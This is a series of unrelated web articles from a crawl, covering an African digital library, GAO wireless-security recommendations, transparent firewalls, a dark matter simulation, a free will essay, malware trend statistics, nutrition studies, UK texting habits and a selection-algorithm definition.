West and the Centre for Lifelong Learning is the African Digital Library which, through a tie-up with NetLibrary.com, offers African students access to a digital library of some 7,700 books. West managed to put this site together with $250,000 in corporate sponsorships, and says additional funds are needed to expand the library, which operates much like a corporeal one: Only one person can access a title online at a time and must "return" it before anyone else can read it. The online version has the advantage of a full text search capability. The purpose is not to provide students with a casual online read, but to facilitate research, says West. Similar projects are under way in three other towns in South Africa: Pietersburg, in the north, East London on the eastern seaboard, and Nkomazi, toward the Mozambican border. These towns have the advantage of telephone links, making it possible to offer computer services along with a business center and telephones. Telephone penetration rates in South Africa, at about 15 percent, are high by African standards -- yet most people still rely on public telephones. This need has given rise to telephone shops, where banks of phones are available for public use. West says the telephone shop is a proven business concept in South Africa, which he is now expanding into a business and computer center. "This has tremendous possibilities throughout Africa. I think we have shown how it is possible to bring computers to the most remote corners of the continent and raise levels of computer literacy," says West.
<urn:uuid:2ad0bf16-af0f-4ef9-818f-edba58688c72>
CC-MAIN-2017-04
http://www.govtech.com/magazines/gt/Computer-Center-Lets-Impoverished-Village-Take.html?page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00317-ip-10-171-10-70.ec2.internal.warc.gz
en
0.959122
1,493
2.765625
3
8 Best Ways to Secure Wireless TechnologyGAO: Agencies Inconsistent on Ways They Secure Wireless Assets "Until agencies take steps to better implement these leading practices, and OMB takes steps to improve governmentwide oversight, wireless networks will remain at an increased vulnerability to attack," GAO Director of Information Security Issues Gregory Wilshusen and Chief Technologist Nabajyoti Barkakati wrote in the 50-page report. To help agencies secure their wireless networks and technologies, GAO came up with eight leading practices: - Develop comprehensive security policies that govern the implementation and use of wireless networks and mobile devices, implement secure encryption with enterprise authentication, establish usage restrictions and implementation guidance for wireless access and enforce access controls for connection of mobile devices. - Employ a risk-based approach for wireless deployment. - Use a centralized wireless management structure that is integrated with the existing wired network. - Establish configuration requirements for wireless networks and devices in accordance with the developed security policies and requirements. - Incorporate wireless and mobile device security component in training. - Use a virtual private network to facilitate the secure transfer of sensitive data during remote access. - Deploy continuous monitoring procedures for detecting rogue access points and clients using a risk-based approach. - Perform regular security assessments to help ensure wireless networks are operating securely. "Many of these practices are consistent with the key information security controls required for an effective information security program ... and reflect wireless-specific aspects of those controls," the Wilshusen and Barkakati wrote in the report requested by the chairs and ranking members of the Senate and House Appropriations Subcommittees on Financial Services and General Government. GAO said the approach to securing wireless technologies is inconsistent among the agencies for most of the following leading practices: - Most agencies developed policies to support federal guidelines and leading practices, but gaps existed, particularly with respect to dual-connected laptops and mobile devices taken on international travel. - All agencies required a risk-based approach for management of wireless technologies. - Many agencies used a decentralized structure for management of wireless, limiting the standardization that centralized management can provide. - Five agencies where GAO performed detailed testing generally securely configured wireless access points but had numerous weaknesses in laptop and smart-phone configurations. - Most agencies were missing key elements related to wireless security in their security awareness training. - Twenty agencies required encryption, and eight of these agencies specified that a virtual private network must be used; four agencies did not require encryption for remote access. - Many agencies had insufficient practices for monitoring or conducting security assessments of their wireless networks. In preparation of the report, GAO reviewed publications, guidance, and other documentation and interviewed subject matter experts in wireless security. GAO also analyzed policies and plans and interviewed agency officials on wireless security at 24 major federal agencies and conducted additional detailed testing at these five agencies: the Departments of Agriculture, Commerce, Transportation, and Veterans Affairs, and the Social Security Administration. Responding to the report, Commerce Secretary Gary Lock said he concurred with the GAO's recommendations to instruct the National Institute of Standards and Technology, a Commerce Department agency, to develop and issuance guidance on: - Technical steps agencies can take to mitigate the risk of dual connected laptops; - Government-wide secure configuration for wireless functionality on laptops and for BlackBerry smartphones; - Appropriate ways agencies can centralize their management of wireless technologies based on business needs; and - Criteria for selection of tools and recommendations on appropriate frequencies of wireless security assessment and recommendations for when continuous monitoring of wireless networks may be appropriate.
<urn:uuid:283b049f-3eae-4975-b243-f5704c4f4559>
CC-MAIN-2017-04
http://www.inforisktoday.com/8-best-ways-to-secure-wireless-technology-a-3137/op-1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00317-ip-10-171-10-70.ec2.internal.warc.gz
en
0.90621
731
2.5625
3
and mobile data terminals. Police officers and other staff will use multi-application smart cards and key-fob tokens along with desktop digital-certificate-management software to keep departmental communications, files and computer systems secure. At the police department's headquarters, more than 25 officers will use the key-fob tokens to log onto their workstations and authenticate themselves on the department's network. Users must identify themselves with two unique factors - something they know, a PIN, and something they have, the authenticating token - before they are granted access to confidential network resources. The police department is also deploying multi-application smart cards to officers in the field. Each officer's digital identity is stored on a smart card, which will allow the officers to authenticate their identity before accessing the Federal Bureau of Investigation's National Crime Information Center criminal database from a mobile data terminal. The smart cards also protect digital credentials used to encrypt local files, secure Web and e-mail sessions and regulate access to buildings. On the desktop side, police department personnel will test security features enabled by a sophisticated public key infrastructure. The desktop security tool supports several flexible methods of file encryption that are easy-to-use and fully integrated into the operating system via Windows Explorer. Desktop-protected folders will give users the ability to transparently encrypt files by moving them into a protected folder. The tool makes it simpler for officers to encrypt files on the mobile data terminal and securely transmit sensitive information to and from the terminal in a squad car. The police department is contracting with RSA Security to test the security tools. A View from Above Florida International University beefed up its TerraFly TerraFly, which debuted last November, is one of the largest publicly accessible databases on the Web. Users can visit the TerraFly Web site to see an overhead view of virtually any location in the United States based on images collected by the U.S. Geological Survey and other sources. The university's goal is to make mapping data available for the entire world within five years, and university officials anticipate that TerraFly will ultimately manage more than 20 terabytes of data. The university will also work with a diverse group of industries that want to use TerraFly, and officials estimate TerraFly will generate up to $1 billion in annual revenue for the university. TerraFly's data-integration capacities will allow an industry to customize GIS data with graphic overlays that contain information specific to their industry. Realtors could overlay information about property values, neighborhood demographics and proximity of shops and schools, producing a comprehensive visual database tailored to the needs of their home-shopping clientele. The university will run IBM's DB2 database software running on Linux to power the High Performance Database Research Center.
<urn:uuid:b9633d62-cf53-4f7b-895e-6ac5282aa7eb>
CC-MAIN-2017-04
http://www.govtech.com/e-government/99405789.html?page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00401-ip-10-171-10-70.ec2.internal.warc.gz
en
0.914704
564
2.640625
3
A firewall in terms of traditional network configurations serves as a default gateway for hosts connecting to one of its secured subnets. A transparent firewall acts like a “stealth firewall” and it is actually a Layer 2 firewall. In order to implement this, the connection of the security equipment is made to same network on both the internal and external ports. However, there is a separate VLAN for each interface. Now let’s discuss the characteristics of transparent firewall mode: - Transparent firewall mode supports outside interface and an inside interface. - The best thing about transparent firewall mode is that it can run in both the single and multiple context modes. - Instead of routing table lookups the MAC lookups are performed. It is quite easy to introduce transparent firewall into a network that is on hand as it is not at all a routed hop, It is not at all essential to do the IP readdressing and its maintenance is easy too. There is also no need of doing the NAT configuration. Transparent mode serves as a bridge but there is no need to worry about the passing of Layer 3 traffic (IP traffic) from a low security level interface to a higher one. In order to permit any traffic one can make use of extended ACL by configuring transparent firewalls. If there is no particular ACL, then only the Address Resolution Protocol (ARP) traffic can pass through transparent firewall and ARP inspection can control it. It is important to note that transparent firewalls pass packets that have a valid EtherType more than or equal to 0x600. This means, that IS-IS packets cannot pass through it. There is one exception i.e. BPDUs, which are actually supported. The addressing of IP should be done in such a manner as if the security appliance is not present in the network. Make sure to have a management IP address for connecting from and to the security appliance and also note that this address must be on the same subnet just like the connected network. In order to differentiate the flow of traffic the Layer 2 device and the security appliance interfaces must be on different VLANs.
<urn:uuid:6d5b60e8-b5ba-42fd-934f-a84fc8c24089>
CC-MAIN-2017-04
https://howdoesinternetwork.com/2012/transparent-firewalls
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00061-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946469
436
2.796875
3
This week astrophysicists from the University of California, Santa Cruz and New Mexico State University harnessed the power of Pleiades, a top ten supercomputer housed at Ames Research Center in Mountain View, California to generate the largest and most realistic simulations of the universe in its infancy. The simulation, which is called Bolshoi (the Russian word for grand) took over four years to develop. It tracks the movement of large bodies through space, to demonstrate how dark matter surrounds galaxies and provide gravity to glue them together. Anatoly Klypin, professor of astronomy at New Mexico State, who wrote the computer code for the simulation. Klypin noted, “These huge cosmological simulations are essential for interpreting the results of ongoing astronomical observations and for planning the new large surveys of the universe that are expected to help determine the nature of the mysterious dark energy,” Klypin went on to discuss the size of the data sets involved—and what is possible when that information is made available to more researchers. He told IBTimes, “We’ve released a lot of the data so that other astrophysicists can start to use it. So far it’s less than 1 percent of the actual output, because the total output is so huge, but there will be additional releases in the future,” Primack said. According to Joel Primack who heads the simulation program at UC Santa Cruz, “The simulation corroborates the accuracy of models that astronomers have built to clarify how the Big Bang theory initiated the source of subatomic particles and galaxies that inhabit our growing universe.” This research will allow scientists to better understand how galaxies formed as well as dark matter and dark energy formation and properties.
<urn:uuid:cf656c95-58e9-4f6e-accd-4bf70e94f159>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/10/03/pleiades_shines_light_on_dark_matter/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00483-ip-10-171-10-70.ec2.internal.warc.gz
en
0.938315
359
3.421875
3
Window Dissection Technology AutoMate's Window Dissection technology can be used to precisely identify any window by literally "seeing" and analyzing the objects and controls that are inside a specific window. Window Dissection encompasses a group of technologies that provide AutoMate with intelligence about active windows and controls on a system. Windows are frequently identified by their title, but occasionally this is not enough. If, for example, there are many windows open with the same window title, it is necessary to specify additional criteria to identify the particular window. Window Dissection allows the specification of a window based on objects, controls, or text inside a window. Multiple objects may be specified which, when taken together, formulates a description of a unique window on the system.
<urn:uuid:692153e6-22c0-4911-94bd-25c64eeebb9b>
CC-MAIN-2017-04
http://www.networkautomation.com/automate/features/window-dissection/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00207-ip-10-171-10-70.ec2.internal.warc.gz
en
0.878748
151
2.75
3
A Guide to Making High-Quality Decisions We are all busy, but not as busy as our approach to decision making would suggest. Many important decisions are left until the last minute, forcing a quick decision when it was not originally necessary. As a result quick decisions are often poor quality decisions. The occasional successful outcome and a hectic lifestyle convince us to continue to make hurried choices, even though many of the problems we are solving today are the result of the “quick fixes” of yesterday. In order to arrive at consistently high-quality decisions, we need to slow down. Our thinking needs to be dissected. Sources of information need to be questioned and assumptions should be verified. Using the steps in this white paper as a guide will help you overcome the common weaknesses in decision analysis. We need to ensure that our thinking is balanced, our logic sound and our information sources are complete and correct. The techniques for doing these things are the role and function of critical thinking. Critical thinking helps to reveal the gaps in our knowledge and imperfections in our reasoning that also stem from conscious or unconscious assumptions and mental shortcuts. To arrive at better decisions, it is necessary to ensure that our reasoning is consistent and methodical. The tools of critical thinking provide a format for questioning the reasoning and logic of the inputs to the decision-making process. The intention of critical thinking is to separate the known from the unknown and the subjective from the objective. Ask questions about all aspects of the problem. - What are the sources of information? - Is there bias in the information? - What is the point of view of the person(s) interpreting the information? - What concepts are inherent in the reasoning being used in the evaluation of options? - Have all possible options been considered?
<urn:uuid:ed58d386-07f3-48a5-9baa-3d701e81e384>
CC-MAIN-2017-04
https://www.globalknowledge.com/ca-en/resources/resource-library/white-paper/a-guide-to-making-high-quality-decisions/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00327-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946182
363
3.46875
3
Here I will lay out two ways of looking at free will, which I call the absolute and the practical perspectives. I believe these two classifications take into account both the existing, well-traveled arguments as well as the treacherous semantic issues that frequently obscure free will discussions. - absolute free will - absolute free will is the ability to have willfully chosen otherwise for any previous decision. This is the type of free will that I argue is required for true moral responsibility. In short, if someone could not have made a willful choice to do otherwise than they did, then they cannot be held responsible for what they did do. But there’s another way of imagining free will that doesn’t conflict with this version, but instead compliments it: - practical free will - practical free will is the ability for an individual to experience having options, considering the outcomes of those options within the context of their value system, and then experience making a choice from among them based on what they want to happen. On my view, and the view of most incompatibilists, this type of free will is completely consistent with absolute free will being impossible. Just because we couldn’t have actually done otherwise than what we did—at the chemical and physical level—doesn’t make the experience of making choices insignificant to us as humans. As Daniel Dennett points out, we as humans have the ability to do things like decide to go to work to avoid being fired, or to influence climate for future generations, or to blow up distant astroids to keep them from crashing into Earth 5 years into the future. These things require complex analysis of variables for the purpose of promoting our own goals–which may even be altruistic if so inclined. In short, the experience of making choices is central to human existence. It serves as the foundation of how we view and treat others, and of how we reward and punish those who make certain choices. Well if we all agree that practical free will is…well…practical, then why am I pursuing this differentiation? Quite simply, I believe it’s beneficial to human civilization to acknowledge that true (absolute) free will is impossible, and thus to realize that all failure, loss, and evil was ultimately the result of bad causes. This doesn’t mean we suddenly give people excuses for making poor choices. We won’t accept, “The atoms made me do it.” at a 1st degree murder trial. We will still hold that person responsible for his actions, but it will be done in a consequentialist fashion rather than a retributivist one. Most of the world today would think it ok to throw rotting fruit at this person before he’s hanged in the town square. Or to curse at him, and damn him to an eternity of suffering in hell. This is considered civilized behavior for one reason: the belief in (Absolute) Free Will. An advanced society would realize that while this murderer had Practical Free will, he did not have Absolute Free Will, meaning the action he took was the only one he could have taken. The result will not be a lack of punishment, but rather a measured response given knowledge that he could not have done differently, i.e.: - A response that best helps the rest of the world - A response that best helps the murderer feel empathy for the victim - A response that keeps the rest of the population safe from the murderer while he is dangerous Possible examples could include incarceration, teaching the attacker about the victim’s life so that he feels sympathy and remorse, or just generally educating him so that he realizes what he’s done is wrong. The key thing to realize is that we don’t know yet what would be best. That’s an empirical question that we need data for. But the one thing we shouldn’t be doing is be wishing an eternity of torture on broken, uneducated people who literally had no choice in the matter. It’s not civilized. It’s barbaric. All anger at offenders, all hatred of evil, all desire for retribution—they all hinge upon the single and untrue proposition that the perpetrator could have done otherwise. If that is incorrect, which I believe it is, then it is beholden on us, as humans attempting to be humane, to change how we treat those who make poor decisions. This affects not just how we treat criminals, but also the rich and the poor, the powerful and the weak, and any other group distinction that we currently feel is choice-based. It affects the very fabric of our civilization. - There is a kind of free will that we don’t, and cannot have, which is called Absolute Free Will. This is the kind that allows us to do otherwise for any previous decision. This type of free will is required for Moral Responsibility because if someone could not have done otherwise then they are not morally responsible. - There is another kind of free will, which is actually the experience of Free Will, called Practical Free will. This is the ability to contemplate options and experience picking the one we want. Everyone experiences this every day, and it should not be discounted, but it does not meet the standard for Moral Responsibility in any context other than a Consequentialist one. - People accepting that we have the latter, but not the former, and adopting a social policy that adjusts based on this truth will have a positive impact on society. This is true because realizing that people lack choice encourages us to look at those who suffering or making poor decisions with empathy instead of hatred or derision. - Image from salon.com.
<urn:uuid:c33976a8-f559-4948-82c4-fa9aa892f28b>
CC-MAIN-2017-04
https://danielmiessler.com/blog/absolute_vs_practical_free_will/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00448-ip-10-171-10-70.ec2.internal.warc.gz
en
0.951049
1,179
2.515625
3
Electric power transmission system uses direct current for the heavy transmission of electric power. Power stations generate alternating current (AC) and most of the transmission line carries AC that oscillates with 50 or 60 cycles per second which causes high energy loss. Direct current doesn’t oscillate. The power converted in a converter station and transfer by overhead lines and cables to the receiving point. Then the power restored to AC in another converter station and injected to AC lines. The report “HVDC Market Forecast 2014-2019”, analyses the market in terms of geography. In terms of geography, market segmentation covers Europe, Asia Pacific, and America. The rising demand for electricity and the need to transmit it with less energy loss is driving the HVDC market to grow. Now a days, the share of energy from renewable sources like wind and solar is increasing but these sorts of power plants are far away from urban area. The increasing wind farms focusing on a reliable source for energy transmission have been driving the HVDC market. Most of the countries worldwide have set up targets to increase the percentage of energy contribution by renewable sources. HVDC power transmission is a reliable system. It helps for long distance power transmission without high energy loss. Renewable energy power plants are mostly driving this market to grow. The report provides an extensive competitive landscaping of key companies operating in this market. The key players of the market are ABB (Switzerland), Alstom (France), Mitsubishi (Japan), and others. Further, country wise market share, new product and services launches, M&A, product portfolio of key players is covered in the report. Along with the market data, you can also customize MMM assessments that meets your company‘s specific needs. Customize to get comprehensive industry standard and deep-dive analysis of the following parameters: Product Benchmarking Outlook - Technology advancement in HVDC transmission system - Comparison of HVDC and HVAC - Competitor’s analysis Customer Segment Outlook - Impact of HVDC innovations on power industry - Challenges in HVDC industry 1.1 Analyst Insights 1.2 Market Definitions 1.3 Market Segmentation & Aspects Covered 1.4 Research Methodology 2 Executive Summary 3 Market Overview Please fill in the form below to receive a free copy of the Summary of this Report Please visit http://www.micromarketmonitor.com/custom-research-services.html to specify your custom Research Requirement
<urn:uuid:33f7bbc1-01ec-4fa4-86fe-01df1c0c2d57>
CC-MAIN-2017-04
http://www.micromarketmonitor.com/market-report/high-voltage-direct-current-hvdc-reports-7508846522.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00264-ip-10-171-10-70.ec2.internal.warc.gz
en
0.896862
528
2.546875
3
According to recently published Websense report for the second half of 2009, 95 percent of user-generated posts on Web sites are spam or malicious, and almost 14 percent of the searches for buzz words/trending news led to malware. Add to this the fact that 86 percent of all emails is spam and 81 percent contained a malicious link, and you might be forgiven for thinking that soon the Internet and we ourselves will be drowning in a sea of unwanted and damaging content. More bad news is that the malware we are exposed to while surfing is located in 71 percent of the cases on legitimate sites that have been compromised, and that the average time it took for anti-virus vendors to deliver a patch once malware was identified was 46 hours! Compared to the 22 hours it took them in the first six months, they are definitely not moving in the right direction. What can we expect in 2010? - More and more blended threats will target computers and trap them into botnets - Smart phones, computers running Windows 7, search engines and legitimate websites will be used by the criminals as infection vectors - Spam and attacks on the social Web and search engines that added real-time search capabilities will increase in frequency - Botnets will start showing a more aggressive behavior – bots will be able to detect and actively uninstall competitor bots - Flaws in Windows 7 and IE 8 will be exploited - SEO poisoning attacks will continue to undermine the trust in search results - Vulnerabilities in iPhone and Android will also be taken advantage of more often, especially since mobile phones are increasingly being used for financial transactions - As Macs gain popularity, they will the attacks that target them. To read the report in detail, go here. NOTE: You’ll have to share some information in order to get it.
<urn:uuid:ea47d4c2-9a7b-486f-a668-ca71dd5ef7a4>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2010/02/09/81-percent-of-e-mail-links-to-malware/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00264-ip-10-171-10-70.ec2.internal.warc.gz
en
0.953834
370
2.515625
3
New Geek Words Now Offically English Our geek culture brings us some really cool technology, and along with it new geek terminology. The authoritative dictionary of the English language, “The Consise Oxford English Dictionary” has announced that it is adding the words sexting, woot, textspeak and retweet to its dictionary. Earierlier this year they added LOL, OMG and to the dictionary. 1. Cyberbullying (noun): The use of electronic communication to bully a person, typically by sending messages of an intimidating or threatening nature: children may be reluctant to admit to being the victims of cyberbullying. 3. Retweet (verb): (On the social networking service Twitter) repost or forward (a message posted by another user): tweet the URL of your posting: people love to retweet job ads. Also: (noun) a reposted or forwarded message on Twitter: traffic spiked quickly and contained a mix of retweets and original posts. 4. Sexting (noun, informal): The sending of sexually explicit photographs or messages via mobile phone: like it or not, sexting is part of growing up in 2010. 5. Textspeak (noun): Language regarded as characteristic of text messages, consisting of abbreviations, acronyms, initials, emoticons, etc.
<urn:uuid:cc215f50-fb51-456c-a3b5-f0d5e3d769b7>
CC-MAIN-2017-04
http://craigpeterson.com/language/geek/new-geek-words-now-offically-english/1396
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00292-ip-10-171-10-70.ec2.internal.warc.gz
en
0.881865
274
2.8125
3
The vast majority of cyberattacks that affect physical machines can also attack virtual machines. Moreover, the risks within virtual environments can be even higher. Although virtualization can improve IT agility and efficiency, it also adds extra layers of technology. Maintaining visibility of each layer of technology – and how they interact – can be difficult. Many virtual environments naturally contain a greater number of ‘attack surfaces’ – and that gives cybercriminals more opportunities to attack the business. Virtual Machines Need Security Designed for Virtual Machines Most businesses have found that, as virtualization spreads to more areas of their IT estate, their overall virtual environment becomes much more complex. Today, a typical enterprise’s virtual environment will include a wide range of different technologies – with many running under different hypervisors. Again, all of this diverse infrastructure needs to be protected against data breach and cyberattacks – but standard security technologies are not well suited to virtual environments.
<urn:uuid:71e27725-302c-4adc-968e-7ad996c76be6>
CC-MAIN-2017-04
https://www.kaspersky.com.au/enterprise-security/virtualization
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00318-ip-10-171-10-70.ec2.internal.warc.gz
en
0.930859
188
2.953125
3
Cogswell M.E.,Division for Heart Disease and Stroke Prevention | Yuan K.,Division for Heart Disease and Stroke Prevention | Gunn J.P.,Division for Heart Disease and Stroke Prevention | Gillespie C.,Division for Heart Disease and Stroke Prevention | And 8 more authors. Morbidity and Mortality Weekly Report | Year: 2014 Background: A national health objective is to reduce average U.S. sodium intake to 2,300 mg daily to help prevent high blood pressure, a major cause of heart disease and stroke. Identifying common contributors to sodium intake among children can help reduction efforts.Methods: Average sodium intake, sodium consumed per calorie, and proportions of sodium from food categories, place obtained, and eating occasion were estimated among 2,266 school-aged (6–18 years) participants in What We Eat in America, the dietary intake component of the National Health and Nutrition Examination Survey, 2009–2010.Results: U.S. school-aged children consumed an estimated 3,279 mg of sodium daily with the highest total intake (3,672 mg/d) and intake per 1,000 kcal (1,681 mg) among high school–aged children. Forty-three percent of sodium came from 10 food categories: pizza, bread and rolls, cold cuts/cured meats, savory snacks, sandwiches, cheese, chicken patties/nuggets/tenders, pasta mixed dishes, Mexican mixed dishes, and soups. Sixty-five percent of sodium intake came from store foods, 13% from fast food/pizza restaurants, 5% from other restaurants, and 9% from school cafeteria foods. Among children aged 14–18 years, 16% of total sodium intake came from fast food/pizza restaurants versus 11% among those aged 6–10 years or 11–13 years (p<0.05). Among children who consumed a school meal on the day assessed, 26% of sodium intake came from school cafeteria foods. Thirty-nine percent of sodium was consumed at dinner, followed by lunch (29%), snacks (16%), and breakfast (15%).Implications for Public Health Practice: Sodium intake among school-aged children is much higher than recommended. Multiple food categories, venues, meals, and snacks contribute to sodium intake among school-aged children supporting the importance of populationwide strategies to reduce sodium intake. New national nutrition standards are projected to reduce the sodium content of school meals by approximately 25%–50% by 2022. Based on this analysis, if there is no replacement from other sources, sodium intake among U.S. school-aged children will be reduced by an average of about 75–150 mg per day and about 220–440 mg on days children consume school meals. © 2014, Department of Health and Human Services. All right reserved. Source Sebastian R.S.,Food Surveys Research Group | Enns C.W.,Food Surveys Research Group | Goldman J.D.,Food Surveys Research Group | Martin C.L.,Food Surveys Research Group | And 3 more authors. Journal of Nutrition | Year: 2015 Background: Epidemiologic studies demonstrate inverse associations between flavonoid intake and chronic disease risk. However, lack of comprehensive databases of the flavonoid content of foods has hindered efforts to fully characterize population intakes and determine associations with diet quality. Objectives: Using a newly released database of flavonoid values, this study sought to describe intake and sources of total flavonoids and 6 flavonoid classes and identify associations between flavonoid intake and the Healthy Eating Index (HEI) 2010. Methods: One day of 24-h dietary recall data from adults aged ≥20 y (n = 5420) collected in What We Eat in America (WWEIA), NHANES 2007-2008, were analyzed. Flavonoid intakes were calculated using the USDA Flavonoid Values for Survey Foods and Beverages 2007-2008. Regression analyses were conducted to provide adjusted estimates of flavonoid intake, and linear trends in total and component HEI scores by flavonoid intake were assessed using orthogonal polynomial contrasts. All analyses were weighted to be nationally representative. Results: Mean intake of flavonoids was 251 mg/d, with flavan-3-ols accounting for 81% of intake. Non-Hispanic whites had significantly higher (P < 0.001) intakes of total flavonoids (275 mg/d) than non-Hispanic blacks (176 mg/d) and Hispanics (139 mg/d). Tea was the primary source (80%) of flavonoid intake. Regardless of whether the flavonoid contribution of tea was included, total HEI score and component scores for total fruit, whole fruit, total vegetables, greens and beans, seafood and plant proteins, refined grains, and empty calories increased (P < 0.001) across flavonoid intake quartiles. Conclusions: A new database that permits comprehensive estimation of flavonoid intakes in WWEIA, NHANES 2007- 2008; identification of their major food/beverage sources; and determination of associations with dietary quality will lead to advances in research on relations between flavonoid intake and health. Findings suggest that diet quality, as measured by HEI, is positively associated with flavonoid intake. © 2015 American Society for Nutrition. Source
<urn:uuid:2dddf2ad-327f-4d95-b4c5-056a7124bee4>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/food-surveys-research-group-1617130/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00072-ip-10-171-10-70.ec2.internal.warc.gz
en
0.92876
1,108
3.34375
3
How to Reduce Data Center Waste It is the silent killer of IT budgets in every industry, for companies of virtually every size: runaway electricity consumption in the data center. Regardless of the ongoing debate about carbon footprints and climate change, Knowledge Center contributor Andy Dominey explains here the most compelling reason for IT executives to pay closer attention to this issue: the opportunity to achieve dramatic and immediate savings by reducing data center waste. The Environmental Protection Agency (EPA) estimated that the computer servers in this country recently consumed 61 billion kilowatt-hours (kWh) in a single year. That is about1.5 percent of all electricity consumed in the country -a $4.5B expense. The problem is not about to go away, either. Consider that, in 2011, the EPA expects that data centers' electricity consumption could spike up to as high as 100 billion kWh-a $7.4B expense. As much as 25 percent of a typical IT budget is allocated simply to paying the electric bill. What's more, that cost is rising as much as 20 percent each year, while IT budgets only increase about six percent annually. However, the costs do not merely stem from the computer hardware itself. For every watt of electricity powering a server, another watt is needed for data center infrastructure such as cooling and lighting. From this perspective, enterprises have a fiduciary duty to cut their costs by achieving greater efficiencies in the data center. Start with the usage profile Few IT managers would argue that their data centers are home to vast numbers of underutilized servers. Commodity hardware and constant expansions to the business application portfolio mean that almost every new application provisioned into the data center ends up with its own server or servers. That is a lot more hardware to track and manage, making it harder to know what every server is doing and if it is still required. Over-provisioning is also common. Many applications designed to serve only 10,000 users to have an infrastructure that serves 20,000-and this is often done cavalierly because costs have dropped so much. This scenario creates unnecessarily large electrical and cooling demands, to say nothing of software licensing, server management and other infrastructure costs. What's more, clusters with multiple load-balanced, fault-tolerant servers often lie dormant while steadily drawing power, as long as the active node functions correctly. In most cases, high availability is not always needed for every application type.
<urn:uuid:ab34c8a1-af66-479f-88e5-df4de393c1b3>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Green-IT/How-to-Reduce-Data-Center-Waste
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00034-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949371
500
2.65625
3
In 2011 more than 150 billion messages were sent in the UK. An Ofcom study celebrating the 20th anniversary of the first text ever sent reveals that the average UK consumer now sends 50 text messages a week. SMS has changed the way people communicate, with the amount of messages sent in the UK tripling in the last five years. Texting is the most preferred way to communicate amongst young people. An average of 193 texts are sent every week by 12-15 year olds which is higher than the UK average. The amount has doubled from last year when only 91 texts were sent per week. Ofcom’s 2012 Communications Market Report revealed that teenagers and young adults choose texting to stay in touch with friends and family rather than talking face-to-face. The report found that 90% of 16-24 year used texting to communicate. Talking on the phone is less popular among young adults with only 67% making mobile calls daily and only 63% talking face to face. "When texting was first conceived many saw it as nothing more than a niche service," said James Thicket, Ofcom’s director of research. "Texts have now surpassed traditional phone calls and meeting face to face as the most frequent way of keeping in touch for UK adults, revolutionising the way we socialise, work and network." While texting has become increasingly popular, Ofcom reveals that the volume of sms messages have declined this year. In Q1 2012 the amount of text messages sent fell to 39.1 billion from 38.5 billion in Q4 2011. In Q2 2012 the number continued to decline with 38.5 billion messages sent. The research suggests that alternative forms of communication, such as social networking sites could be the reason for the sms decline. The recent increase of tablet ownership could also be responsible for the trend. "For the first time in history of mobile phones, SMS volumes are showing signs of decline. However the availability of a wider range of communications tools like instant messaging and social networking sites, mean that people might be sending fewer SMS messages, but they are ‘texting’ more than ever before."
<urn:uuid:ac0baac6-967c-47ad-9a01-230767402257>
CC-MAIN-2017-04
http://www.cbronline.com/news/texting-is-now-more-popular-than-talking-031212
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00338-ip-10-171-10-70.ec2.internal.warc.gz
en
0.957591
441
2.625
3
Definition: Given an array A of n elements and a positive integer k ≤ n, find the kth smallest element of A and partition the array such that A, ..., A[k-1] ≤ A[k] ≤ A[k+1], ..., A[n]. See also select kth element, Select, MODIFIND, Find. Note: Algorithms to solve this problem are often used in sort algorithms or to find the median of a set. These can be easily changed to find the kth largest element. If you have suggestions, corrections, or comments, please get in touch with Paul Black. Entry modified 2 March 2015. HTML page formatted Mon Mar 2 16:13:48 2015. Cite this as: Vladimir Zabrodsky, "select and partition", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 2 March 2015. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/selectAndPartition.html
<urn:uuid:f5e165e8-8604-4801-958c-13322216a444>
CC-MAIN-2017-04
http://www.darkridge.com/~jpr5/mirror/dads/HTML/selectAndPartition.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00182-ip-10-171-10-70.ec2.internal.warc.gz
en
0.833946
234
3.484375
3
